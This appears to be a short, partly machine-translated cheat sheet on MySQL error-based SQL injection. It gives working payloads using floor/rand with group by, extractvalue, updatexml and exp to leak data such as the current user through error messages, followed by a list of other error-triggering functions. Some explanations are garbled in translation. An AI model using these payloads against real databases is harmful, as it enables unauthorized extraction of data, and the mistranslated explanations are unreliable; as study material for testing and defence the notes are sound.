floor function
select count(*),(floor(rand(0)*2))x from table group by x;
select query statement
group by to group (the same as a group)
rand() generates a random number from 0 to 1
floor() returns an integer
count() to integrate data (similar to deduplication)
Reason: mysql will create a virtual table when executing the statement. There are two fields in the table (one is the value of the group and the value of the count). When the group already exists, it will explode.
参考:http://www.cnblogs.com/sfriend/p/11365999.html
extractvalue function
Limit the length to 32 bits
and extractvalue(1,concat(0x7e,(select user()),0x7e));
This parameter accepts two string parameters, an xml tag fragment and an xpath expression, and the second parameter requires an xpath format string, and we are not therefore reporting an error.
参考:https://www.cnblogs.com/xishaonian/p/6250444.html
updatexml function
Limit the length to 32 bits
and updatexml(1,concat(0x7e,(select user()),0x7e),1)
The first parameter of updatexml(1,2,3) is string format, which is the name of the xml document object, the second parameter is a string in xpath format, and the third string format is to replace the found data that meets the conditions. The second parameter is a string in xpath format, and an error is reported because it does not meet the rules.
参考:http://blog.csdn.net/qq_37873738/article/details/88042610
name_const function
Only the version information of the database can be obtained
exp function
exp(~(select * from(select user())a))
exp(int) This function will return a result worth the power of x. When the value exceeds the range of mysql, it will explode. The meaning of the above payload is: first query the data of user() and name it a and then select * from a to set the result set a All inquiries out.
报错函数:
floor()
extractvalue()
updatexml()
name_const()
join()
exp()
geometry collection()
polygon()
multipoint()
multlinestring()
multpolygon()
linestring()
参考:http://www.mamicode.com/info-detail-2366760.html